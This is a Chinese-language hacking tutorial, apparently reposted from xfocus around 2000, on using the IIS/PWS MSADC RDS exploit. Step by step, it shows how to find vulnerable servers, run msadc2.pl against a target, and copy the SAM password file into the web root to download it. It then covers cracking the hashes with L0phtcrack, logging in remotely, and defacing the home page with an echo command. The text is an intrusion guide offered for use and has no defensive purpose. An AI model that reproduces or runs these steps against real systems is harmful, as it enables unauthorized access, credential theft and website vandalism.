登录社区:用户名: 密码: 忘记密码 网页功能:加入收藏 设为首页 网站搜索  

文档

下载

图书

论坛

安全

源码

硬件

游戏
首页 信息 空间 VB VC Delphi Java Flash 补丁 控件 安全 黑客 电子书 笔记本 手机 MP3 杀毒 QQ群 产品库 分类信息 编程网站
  立华软件园 - 安全技术中心 - 技术文档 - 黑客教学 技术文章 | 相关下载 | 电子图书 | 攻防录像 | 安全网站 | 在线论坛 | QQ群组 | 搜索   
 安全技术技术文档
  · 安全配制
  · 工具介绍
  · 黑客教学
  · 防火墙
  · 漏洞分析
  · 破解专题
  · 黑客编程
  · 入侵检测
 安全技术工具下载
  · 扫描工具
  · 攻击程序
  · 后门木马
  · 拒绝服务
  · 口令破解
  · 代理程序
  · 防火墙
  · 加密解密
  · 入侵检测
  · 攻防演示
 安全技术论坛
  · 安全配制
  · 工具介绍
  · 防火墙
  · 黑客入侵
  · 漏洞检测
  · 破解方法
 其他安全技术资源
  · 攻防演示动画
  · 电子图书
  · QQ群组讨论区
  · 其他网站资源
最新招聘信息

简单使用 IIS/PWS - RDS Exploit
发表日期:2003-08-13作者:[] 出处:  

先查找一台运行了IIS或者PWS的服务器:

你可以使用下面的方法了搜寻:

1,到www.netcraft.com查找

2,通过www.altavista.com搜寻通用的IIS文件:

如: link:/showcode.asp 或者url:/msadc/ 或者 url:/iishelp

但你查询到服务器类型的时候,你可以在你的IE中使用下面的URL请求:

www.server.com/index.ida or www.server.com/.idq

大多数服务器就会告诉你WEB服务的默认物理地址,当然有很多中

方法可以获得WEB服务程序在系统上的物理地址,你可以到BUGTRAQ

查询。

现在你就在http://www.xfocus.org站点下载一个msadc2.pl或者msadc.pl程序,

当然如果你是在WIN系统上操作的话,你还需要到www.activestate.com站点中

下载ActivePerl解释器来使用,你如果有RD LINUX,FREEBSD系统当然不需要

装载PERL了,因为他们默认就存在了。

在WINDOWS下你可以使用command.com,在NT下你使用cmd.exe来执行,在LINUX

下你就可以直接执行下面的命令:

perl -x c:\msadc2.pl -h www.server.com

如果那个服务器确实存在这个RDS/IIS漏洞的话,就会在

cmd /c下面停止

然后你在停止处打入你所需要的命令,如:

copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\temp.fil

接着你在你的浏览器上打入如下的请求:

www.server.com/temp.fil

OK,你就这样获得了对方机器上的NT HASHED的密码,你的先extract这个

文件,在(cmd/command)你可以使用下面的命令:

extract temp.fil whatever.file

然后你就可以使用L0phtcrack(可以从www.l0pht.com/l0phtcrack下载)

或者其他类似的破密码工具来破解whatever.file.在你破解出whatever.file

的密码之后,你可以编辑你自己机器上的lmhosts.sam,并加上下面的名字:

www.server.com

注:lmhosts.sam在NT下是保存在\winnt\system32\drivers\etc 目录下的,在

WINDOWS 9X是在\windows\config\ 。

然后你就使用查找计算机的方法来搜寻:

www.server.com

等找到计算机后,你点击相应图标,再打入用户名和密码,你就进入了

那个机器。

当然你也可以使用NET USE命令来远程使用那个计算机,呵呵。

当然如果你光光要更改起主页,只要找到对应服务器上的默认页面,如:

index.htm, index.html, index.asp, default.htm, default.html default.asp,

等等。

然后再运行:

perl -x c:\msadc2.pl -h www.server.com

cmd/c: echo 这个站点已经被CASPER和QUACK黑掉了,哈哈........ >

c:\inetpub\wwwroot\default.htm

当然有很多其他方法,就看你想怎么做了。现在很多机器升级了以后

应该没有这个漏洞了,但既然是十大EXPLOIT之一,就随便写写罗。

xundi@xfocus.org 2000-08-10

http://focus.sivlersand.net

http://www.xfocus.org

http://www.xfocus.net

我来说两句】 【发送给朋友】 【加入收藏】 【返加顶部】 【打印本页】 【关闭窗口
中搜索 简单使用 IIS/PWS - RDS Exploit

 ■ [欢迎对本文发表评论]
用  户:  匿名发出:
您要为您所发的言论的后果负责,故请各位遵纪守法并注意语言文明。

最新招聘信息

关于我们 / 合作推广 / 给我留言 / 版权举报 / 意见建议 / 广告投放 / 友情链接  
Copyright ©2001-2006 Lihuasoft.net webmaster(at)lihuasoft.net
网站编程QQ群   京ICP备05001064号 页面生成时间:0.00194